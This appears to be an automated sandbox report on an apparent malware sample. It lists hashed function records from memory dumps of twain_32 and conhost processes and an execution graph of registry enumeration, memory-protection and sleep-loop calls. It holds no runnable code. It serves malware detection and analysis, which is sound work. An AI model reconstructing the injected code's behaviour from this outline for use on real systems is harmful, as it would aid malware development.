                                                                • Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                                • Instruction Fuzzy Hash: FF31B532B01B5592EB56EF67E84837D6BA0FB64B84F0640A09F4E07B54EF38C4A1C700
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2019851682.0000024B34550000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B34550000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_24b34550000_twain_32.jbxd
                                                                Similarity
                                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                • String ID:
                                                                • API String ID: 517849248-0
                                                                • Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                                • Instruction ID: a9d0cb570af524af4dd029804e5c241c6aa4b1c5a1aaef15b43a408fddb3b04e
                                                                • Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                                • Instruction Fuzzy Hash: CE016921B10A41A6EB11DF13E85C3696BA1F798FD0F4981B5CE8A83754DF3CC989C740
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2019851682.0000024B34550000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B34550000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_24b34550000_twain_32.jbxd
                                                                Similarity
                                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                • String ID:
                                                                • API String ID: 449555515-0
                                                                • Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                                • Instruction ID: 8110c1600766218d73482ff2db050e82b6209ee03dae274cb4897d3bfda3787e
                                                                • Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                                • Instruction Fuzzy Hash: 8C114075B2274192FB269F23E40D72A6BA0BB68B95F0514A4CD4D47764EF3CC408C700
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2019851682.0000024B34550000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B34550000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_24b34550000_twain_32.jbxd
                                                                Similarity
                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                • String ID: csm$f
                                                                • API String ID: 2395640692-629598281
                                                                • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                                • Instruction ID: 8adbce4d9f7289ae21848866c2d7f21c4470159ad7ace03fa003e8fc4049feed
                                                                • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                                • Instruction Fuzzy Hash: A851BC32B116508AEB16DF26E44CB6D3B96F354B88F5281E0DA0B47B88EB79DC41CF05
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2019851682.0000024B34550000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B34550000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_24b34550000_twain_32.jbxd
                                                                Similarity
                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                • String ID: csm$f
                                                                • API String ID: 2395640692-629598281
                                                                • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                                • Instruction ID: 451d6ea4bde41d8cea76d589cb42aaa0dbbe969e674acbd34b239564e0f2ee66
                                                                • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                                • Instruction Fuzzy Hash: C931AD32A1069096E716EF13E84C72D3FA5F754B88F068194EE4B07785DB3CC940CB05
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2019851682.0000024B34550000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B34550000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_24b34550000_twain_32.jbxd
                                                                Similarity
                                                                • API ID: FinalHandleNamePathlstrlen
                                                                • String ID: \\?\
                                                                • API String ID: 2719912262-4282027825
                                                                • Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                                • Instruction ID: 4b58d5bfb8d451bd9a9f7b299f15b6434cf8dd2c7aed3b2c67f6b54c191d3146
                                                                • Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                                • Instruction Fuzzy Hash: 7FF06232B14641A2FB218F66F5D836D6F60F754B98F8990B4CA494B958DF3CC68CCB00
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2019851682.0000024B34550000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B34550000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_24b34550000_twain_32.jbxd
                                                                Similarity
                                                                • API ID: CombinePath
                                                                • String ID: \\.\pipe\
                                                                • API String ID: 3422762182-91387939
                                                                • Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                                • Instruction ID: dbf1faf976e8c48d4965a12b2cc45e7c9766283628c23aa1d1f0f256b4ed8d2b
                                                                • Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                                • Instruction Fuzzy Hash: DCF0A720B14B80A2EA018F13B90C12D6A21FB58FD0F09A1B1DE5B07B2CCF2CC445C700
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2019851682.0000024B34550000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B34550000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_24b34550000_twain_32.jbxd
                                                                Similarity
                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                • String ID: CorExitProcess$mscoree.dll
                                                                • API String ID: 4061214504-1276376045
                                                                • Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                                • Instruction ID: b7a31e8319a63fa008621a321de1447a337f76645fbe7cdb7e33b4d881722828
                                                                • Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                                • Instruction Fuzzy Hash: 0EF01271B31644A1EF565F62F89C3692B60EB58BD1F463099950B45565DF3CC48CC710
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2019851682.0000024B34550000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B34550000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_24b34550000_twain_32.jbxd
                                                                Similarity
                                                                • API ID: CurrentThread
                                                                • String ID:
                                                                • API String ID: 2882836952-0
                                                                • Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                                • Instruction ID: fb182d61771eea262363ebaf2df530acb49614dbd551da5eaf1fae5b5a12fd0e
                                                                • Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                                • Instruction Fuzzy Hash: 1902CA32619B8486E7A1CF56F49436EBBA0F3C5794F114195EA8E87BA9DF7CC484CB00
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2019851682.0000024B34550000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B34550000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_24b34550000_twain_32.jbxd
                                                                Similarity
                                                                • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                                • String ID:
                                                                • API String ID: 2210144848-0
                                                                • Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                                • Instruction ID: 05b32be4c070ad7bae230f3baa4678db0b4c604db899f2543984d1c3d757eab0
                                                                • Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                                • Instruction Fuzzy Hash: FA81BC23E30650AAFB62EF6788483AD2FA1F744F98F466196DE0A53792DB3CC445C310
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2019851682.0000024B34550000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B34550000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_24b34550000_twain_32.jbxd
                                                                Similarity
                                                                • API ID: CurrentThread
                                                                • String ID:
                                                                • API String ID: 2882836952-0
                                                                • Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                                                • Instruction ID: 6dda425a4bc4812032c9caaf1efdf56a454c5ea536469c474fabc4de60fae616
                                                                • Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                                                • Instruction Fuzzy Hash: 8D61B936929B44C7E7A18F16E45832EBBA0F3C8754F121595EA8E87BA8DB7CC544CF00
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2019665355.0000024B34510000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000024B34510000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_24b34510000_twain_32.jbxd
                                                                Similarity
                                                                • API ID: _set_statfp
                                                                • String ID:
                                                                • API String ID: 1156100317-0
                                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                • Instruction ID: 40953941a84953564d4704be1a20e0ee06e9c0cf233a89a411d8ad744bea3388
                                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                • Instruction Fuzzy Hash: 7911E922E54E0002F66A1D6BE45E3AF1C42EB74374F4B07A7EAB616FD68B18CC414104
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2019851682.0000024B34550000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B34550000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_24b34550000_twain_32.jbxd
                                                                Similarity
                                                                • API ID: _set_statfp
                                                                • String ID:
                                                                • API String ID: 1156100317-0
                                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                • Instruction ID: 25825365ba59cbe5ba6ce6b282c9cd4778fc311e78f81d569e7f1f8fd4703b95
                                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                • Instruction Fuzzy Hash: 16118622E74A0121F6AA1967E45E375AC516B64374F0777ECFAF6063E78F5CCC418224
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2019851682.0000024B34550000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B34550000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_24b34550000_twain_32.jbxd
                                                                Similarity
                                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                • String ID:
                                                                • API String ID: 1092925422-0
                                                                • Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                                • Instruction ID: 1f120d6e7c2aa70cfb36ade27133ae2953e98244e757542a6b2bba61e37e118a
                                                                • Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                                • Instruction Fuzzy Hash: 2B115E2AB15B4192FB169F52F4183696AB0F758B94F0500A9DE8E47B94EF3DC509C700
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2019665355.0000024B34510000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000024B34510000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_24b34510000_twain_32.jbxd
                                                                Similarity
                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                • String ID: csm$f
                                                                • API String ID: 3242871069-629598281
                                                                • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                                • Instruction ID: 17271b9775df5c3c91d1bf131a980bfe1d9dfe1b47eec6effbedcd8c0e8d26a8
                                                                • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                                • Instruction Fuzzy Hash: 9851D232B126008BEF26DF26E468B193B95F362BD8F6385A4DE1747788DB38C841C704
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2019665355.0000024B34510000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000024B34510000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_24b34510000_twain_32.jbxd
                                                                Similarity
                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                • String ID: csm$f
                                                                • API String ID: 3242871069-629598281
                                                                • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                                • Instruction ID: 5de7b908d7eb46053df6aa46ddd03c83e84568e4d8d66607cf1234cb93f4080a
                                                                • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                                • Instruction Fuzzy Hash: 1731AC76A11650A6EB26DF13E898B193BA4F741BD8F578194AE5B07788CB3CC941C708
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2019851682.0000024B34550000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B34550000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_24b34550000_twain_32.jbxd
                                                                Similarity
                                                                • API ID: FileType
                                                                • String ID: \\.\pipe\
                                                                • API String ID: 3081899298-91387939
                                                                • Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                                • Instruction ID: 986de81cc9f3f966cb04e359d38bc7b96372e14bd2c68fd21c94a642057ecd7c
                                                                • Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                                • Instruction Fuzzy Hash: CC71D332A14B8186EB26DF67A9483BE6FA0F754B84F4640D6ED4B43B89DF34C544CB40
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2019851682.0000024B34550000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B34550000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_24b34550000_twain_32.jbxd
                                                                Similarity
                                                                • API ID: FileType
                                                                • String ID: \\.\pipe\
                                                                • API String ID: 3081899298-91387939
                                                                • Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                                • Instruction ID: ab659da1531d94e61bba8f76e4d617c53c8b0980be4b7f649e52aea8cd55437d
                                                                • Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                                • Instruction Fuzzy Hash: 5C51E836A1878182EA769F2BA55C37E6E91F385780F4640E5ED8B03B99CF39C405CF40
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2019851682.0000024B34550000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B34550000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_24b34550000_twain_32.jbxd
                                                                Similarity
                                                                • API ID: ErrorFileLastWrite
                                                                • String ID: U
                                                                • API String ID: 442123175-4171548499
                                                                • Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                                • Instruction ID: 546986e17cc126c9f260584fcd4c4723f3b97a3a3ebeca427d8296f67d65949c
                                                                • Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                                • Instruction Fuzzy Hash: E541F733B24A4091EB21DF26E4483AA7BA0F398BD4F425125EE4E87798EF3CC441CB40
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2019851682.0000024B34550000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B34550000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_24b34550000_twain_32.jbxd
                                                                Similarity
                                                                • API ID: Stringtry_get_function
                                                                • String ID: LCMapStringEx
                                                                • API String ID: 2588686239-3893581201
                                                                • Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                                • Instruction ID: 047accfd18f77c9b8852c13edf4f2e0166e3e21984667cd19876987e96b1b587
                                                                • Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                                • Instruction Fuzzy Hash: 6911F436A18B8096D7618F16B48429ABBA4F789BD0F548166EA8E83B59DF38C454CB40
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2019851682.0000024B34550000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B34550000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_24b34550000_twain_32.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFileHeaderRaise
                                                                • String ID: csm
                                                                • API String ID: 2573137834-1018135373
                                                                • Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                                • Instruction ID: 9c9158f4a493fcdb8fccd0c34d662194b52b1cac770492d6da101f9d32cd5091
                                                                • Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                                • Instruction Fuzzy Hash: 70112132614B8092EB618F16F44436D7BA5F788B98F5942A5DF8D07768DF3CC955CB00
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2019851682.0000024B34550000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B34550000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_24b34550000_twain_32.jbxd
                                                                Similarity
                                                                • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                                • String ID: InitializeCriticalSectionEx
                                                                • API String ID: 539475747-3084827643
                                                                • Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                                • Instruction ID: 4d53bc2f684d8dbfd7a1ce239449174cb7aadd08da651cdb5ba5345de4b8ca49
                                                                • Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                                • Instruction Fuzzy Hash: 51F08222F20780B1E7069F47F4486AD6B21AB88B91F5AA0A5A95A03B54CF3CC999C704
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2019665355.0000024B34510000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000024B34510000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_24b34510000_twain_32.jbxd
                                                                Similarity
                                                                • API ID: try_get_function
                                                                • String ID: November$October
                                                                • API String ID: 2742660187-1636048786
                                                                • Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                                • Instruction ID: 5f710538dd2b30e004e38f0d5da7dacf11acd2e6ba5017aaeeef8ab51406cf00
                                                                • Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                                • Instruction Fuzzy Hash: 82E0DF21F0464592FF079F57F45E2E83B21EB9A744FAB50A3A91906396CF3CC886C340
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2019851682.0000024B34550000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B34550000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_24b34550000_twain_32.jbxd
                                                                Similarity
                                                                • API ID: Valuetry_get_function
                                                                • String ID: FlsSetValue
                                                                • API String ID: 738293619-3750699315
                                                                • Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                                • Instruction ID: 1830439ba5b2422d1820c333c9645479c3867a0a56c2edad11773341fc573fab
                                                                • Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                                • Instruction Fuzzy Hash: 59E09262F20640B1FB074F57F84D6BC2B32BB88781F4AA0A2D90A06355CF3CC859C704
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2019851682.0000024B34550000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B34550000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_24b34550000_twain_32.jbxd
                                                                Similarity
                                                                • API ID: Heap$Process$AllocFree
                                                                • String ID:
                                                                • API String ID: 756756679-0
                                                                • Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                                • Instruction ID: 632107949db22ca789e6ef4169cb3b34457fadc4cbd4950f0b8a4b6cf3f982c6
                                                                • Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                                • Instruction Fuzzy Hash: 6221A422E15B8092EB528F5BE40826EFFA0FB89B94F064160DE8D47B24EF7CC542C700
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2019851682.0000024B34550000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B34550000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_24b34550000_twain_32.jbxd
                                                                Similarity
                                                                • API ID: Heap$AllocProcess
                                                                • String ID:
                                                                • API String ID: 1617791916-0
                                                                • Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                                • Instruction ID: ea20568a8e1de818be7db3500e2a4c22120bca330af692d7905e51c78ef04446
                                                                • Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                                • Instruction Fuzzy Hash: A5E06571A21A0097E7098FA3D80834A3AE1FB9AF01F4AD024C90907360DF7EC4DACB80

                                                                Execution Graph

                                                                Execution Coverage:0.7%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:68
                                                                Total number of Limit Nodes:2
                                                                execution_graph 13978 216aaa72908 13980 216aaa72936 13978->13980 13979 216aaa72a2b LoadLibraryA 13979->13980 13980->13979 13981 216aaa72aa7 13980->13981 13982 216acfd1c28 13987 216acfd1650 GetProcessHeap HeapAlloc 13982->13987 13984 216acfd1c3e Sleep SleepEx 13985 216acfd1c37 13984->13985 13985->13984 13986 216acfd15c0 StrCmpIW StrCmpW 13985->13986 13986->13985 14031 216acfd1274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 13987->14031 13989 216acfd1678 14032 216acfd1274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 13989->14032 13991 216acfd1689 14033 216acfd1274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 13991->14033 13993 216acfd1692 14034 216acfd1274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 13993->14034 13995 216acfd169b 13996 216acfd16b6 RegOpenKeyExW 13995->13996 13997 216acfd18ce 13996->13997 13998 216acfd16e8 RegOpenKeyExW 13996->13998 13997->13985 13999 216acfd1711 13998->13999 14000 216acfd1727 RegOpenKeyExW 13998->14000 14035 216acfd12c8 RegQueryInfoKeyW 13999->14035 14002 216acfd1762 RegOpenKeyExW 14000->14002 14003 216acfd174b 14000->14003 14004 216acfd179d RegOpenKeyExW 14002->14004 14005 216acfd1786 14002->14005 14045 216acfd104c RegQueryInfoKeyW 14003->14045 14009 216acfd17c1 14004->14009 14010 216acfd17d8 RegOpenKeyExW 14004->14010 14008 216acfd12c8 16 API calls 14005->14008 14012 216acfd1793 RegCloseKey 14008->14012 14013 216acfd12c8 16 API calls 14009->14013 14014 216acfd1813 RegOpenKeyExW 14010->14014 14015 216acfd17fc 14010->14015 14012->14004 14016 216acfd17ce RegCloseKey 14013->14016 14018 216acfd184e RegOpenKeyExW 14014->14018 14019 216acfd1837 14014->14019 14017 216acfd12c8 16 API calls 14015->14017 14016->14010 14022 216acfd1809 RegCloseKey 14017->14022 14020 216acfd1872 14018->14020 14021 216acfd1889 RegOpenKeyExW 14018->14021 14023 216acfd104c 6 API calls 14019->14023 14024 216acfd104c 6 API calls 14020->14024 14025 216acfd18c4 RegCloseKey 14021->14025 14026 216acfd18ad 14021->14026 14022->14014 14027 216acfd1844 RegCloseKey 14023->14027 14028 216acfd187f RegCloseKey 14024->14028 14025->13997 14029 216acfd104c 6 API calls 14026->14029 14027->14018 14028->14021 14030 216acfd18ba RegCloseKey 14029->14030 14030->14025 14031->13989 14032->13991 14033->13993 14034->13995 14036 216acfd1334 GetProcessHeap HeapAlloc 14035->14036 14037 216acfd1499 RegCloseKey 14035->14037 14038 216acfd1485 GetProcessHeap HeapFree 14036->14038 14039 216acfd135d RegEnumValueW 14036->14039 14037->14000 14038->14037 14041 216acfd13af 14039->14041 14041->14038 14041->14039 14042 216acfd142f lstrlenW GetProcessHeap HeapAlloc StrCpyW 14041->14042 14043 216acfd13dd GetProcessHeap HeapAlloc 14041->14043 14044 216acfd1413 GetProcessHeap HeapFree 14041->14044 14051 216acfd1554 14041->14051 14042->14041 14043->14041 14044->14042 14046 216acfd11b5 RegCloseKey 14045->14046 14049 216acfd10b9 14045->14049 14046->14002 14047 216acfd10c7 RegEnumValueW 14047->14049 14048 216acfd1149 GetProcessHeap HeapAlloc 14048->14049 14049->14046 14049->14047 14049->14048 14050 216acfd117f GetProcessHeap HeapFree 14049->14050 14050->14049 14052 216acfd15a4 14051->14052 14053 216acfd156e 14051->14053 14052->14041 14053->14052 14054 216acfd1585 StrCmpIW 14053->14054 14055 216acfd158d StrCmpW 14053->14055 14054->14053 14055->14053

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2283543838.00000216ACFD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216ACFD0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_216acfd0000_conhost.jbxd
                                                                Similarity
                                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                • String ID:
                                                                • API String ID: 1683269324-0
                                                                • Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                                • Instruction ID: 893d5dacaad420b2dacc5c6a634efc7938e22cfb34dad62e93cc16f6fce40d5d
                                                                • Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                                • Instruction Fuzzy Hash: 06115B7161460982FB62972DB90E3ED22EFAF7630EF4441259F56A6198EF7DC08CC210

                                                                Control-flow Graph

                                                                APIs
                                                                  • Part of subcall function 00000216ACFD1650: GetProcessHeap.KERNEL32 ref: 00000216ACFD165B
                                                                  • Part of subcall function 00000216ACFD1650: HeapAlloc.KERNEL32 ref: 00000216ACFD166A
                                                                  • Part of subcall function 00000216ACFD1650: RegOpenKeyExW.ADVAPI32 ref: 00000216ACFD16DA
                                                                  • Part of subcall function 00000216ACFD1650: RegOpenKeyExW.ADVAPI32 ref: 00000216ACFD1707
                                                                  • Part of subcall function 00000216ACFD1650: RegCloseKey.ADVAPI32 ref: 00000216ACFD1721
                                                                  • Part of subcall function 00000216ACFD1650: RegOpenKeyExW.ADVAPI32 ref: 00000216ACFD1741
                                                                  • Part of subcall function 00000216ACFD1650: RegCloseKey.ADVAPI32 ref: 00000216ACFD175C
                                                                  • Part of subcall function 00000216ACFD1650: RegOpenKeyExW.ADVAPI32 ref: 00000216ACFD177C
                                                                  • Part of subcall function 00000216ACFD1650: RegCloseKey.ADVAPI32 ref: 00000216ACFD1797
                                                                  • Part of subcall function 00000216ACFD1650: RegOpenKeyExW.ADVAPI32 ref: 00000216ACFD17B7
                                                                  • Part of subcall function 00000216ACFD1650: RegCloseKey.ADVAPI32 ref: 00000216ACFD17D2
                                                                  • Part of subcall function 00000216ACFD1650: RegOpenKeyExW.ADVAPI32 ref: 00000216ACFD17F2
                                                                • Sleep.KERNEL32 ref: 00000216ACFD1C43
                                                                • SleepEx.KERNELBASE ref: 00000216ACFD1C49
                                                                  • Part of subcall function 00000216ACFD1650: RegCloseKey.ADVAPI32 ref: 00000216ACFD180D
                                                                  • Part of subcall function 00000216ACFD1650: RegOpenKeyExW.ADVAPI32 ref: 00000216ACFD182D
                                                                  • Part of subcall function 00000216ACFD1650: RegCloseKey.ADVAPI32 ref: 00000216ACFD1848
